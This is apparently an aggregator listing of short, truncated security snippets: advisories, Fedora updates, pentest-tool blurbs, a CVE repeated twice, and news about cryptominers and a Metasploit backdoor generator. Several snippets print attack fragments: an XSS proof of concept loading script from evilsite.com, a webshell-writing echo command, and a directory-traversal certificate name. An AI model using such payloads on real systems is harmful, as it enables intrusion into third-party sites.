Cryptocurrency Mining Malware Hosted in Amazon S3 Bucket

As Bitcoin’s price continues to soar beyond $4,000 USD per, cybercriminals are responding in kind by using techniques long reserved for adware, click-fraud and spying to now drop cryptocurrency miners onto compromised computers. The latest incident comes from a rash of drive-by downloads that are...

Kaspersky AntiVirus - Certificate Handling Directory Traversal

Source: https://code.google.com/p/google-security-research/issues/detail?id=539 When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. I observed that the naming pattern is CN.cer. I created a certificate with CN="../../../../Users/All...

[SECURITY] Fedora 20 Update: mingw-xerces-c-3.1.1-9.fc20

Xerces-C is a validating XML parser written in a portable subset of C++. Xerces-C makes it easy to give your application the ability to read and write XML data. A shared library is provided for parsing, generating, manipulating, and validating XML documents. Xerces-C is faithful to the XML 1.0...

Penetration Testing Browser Bundle: PenQ

PenQ is an open source, Linux-based penetration testing browser bundle we built over Mozilla Firefox. It comes pre-configured with security tools for spidering, advanced web searching, fingerprinting, anonymous browsing, web server scanning, fuzzing, report generating and more. Penetration Testin...

Jason Geffner on Tortilla

Dennis Fisher talks with Jason Geffner of CrowdStrike about the new tool he released at Black Hat called Tortilla and his research on malware that uses domain-generating algorithms. audio https://media.threatpost.com/wp-content/uploads/sites/103/2013/08/07043604/digitalunderground120.mp3 Download...

[PenQ] The Security Testing Browser Bundle

PenQ is an open source Linux based penetration testing browser bundle we built over Mozilla Firefox. It comes pre-configured with security tools for spidering, advanced web searching, fingerprinting, anonymous browsing, web server scanning, fuzzing, report generating and more. PenQ is configured ...

[SECURITY] Fedora 17 Update: crypto-utils-2.4.1-39.fc17

This package provides tools for managing and generating SSL certificates and keys...

Fully Undetectable Backdoor generator for Metasploit

Fully Undetectable Backdoor generator for Metasploit Security Labs Experts from Indian launch an automated Anti-Virus and Firewall Bypass Script. Its an Modified and Stable Version in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how i...

[SECURITY] Fedora 11 Update: xerces-c27-2.7.0-8.fc11

Xerces-C is a validating XML parser written in a portable subset of C++. Xerces-C makes it easy to give your application the ability to read and wri te XML data. A shared library is provided for parsing, generating, manipulatin g, and validating XML documents. Xerces-C is faithful to the XML 1.0...

Echo out WebShell-vulnerability warning-the black bar safety net

On a side note process, you can execute the cmd without permission and relatively low in the case, sometimes you can use this method to help you down the target Station. Command format The Echo statement the target Station absolute directory For example: echo ^^%execute request"0"%^...

CVE-2006-5116

Multiple cross-site request forgery CSRF vulnerabilities in phpMyAdmin before 2.9.1-rc1 allow remote attackers to perform unauthorized actions as another user by 1 directly setting a token in the URL though dynamic variable evaluation and 2 unsetting arbitrary variables via the REQUEST array,...

CVE-2006-5116

Multiple cross-site request forgery CSRF vulnerabilities in phpMyAdmin before 2.9.1-rc1 allow remote attackers to perform unauthorized actions as another user by 1 directly setting a token in the URL though dynamic variable evaluation and 2 unsetting arbitrary variables via the REQUEST array,...

Kmita FAQ v1.0

Kmita FAQ v1.0 Homepage: http://www.kmita-faq.com Effected files: search.php index.php Search.php does not sanatize user input before dynamically genrating it. Proof of concept: http://www.example.com/search.php?q=SCRIPT20SRC=http://evilsite.com/xss.js/SCRIPT SQL Injection proof of concept:...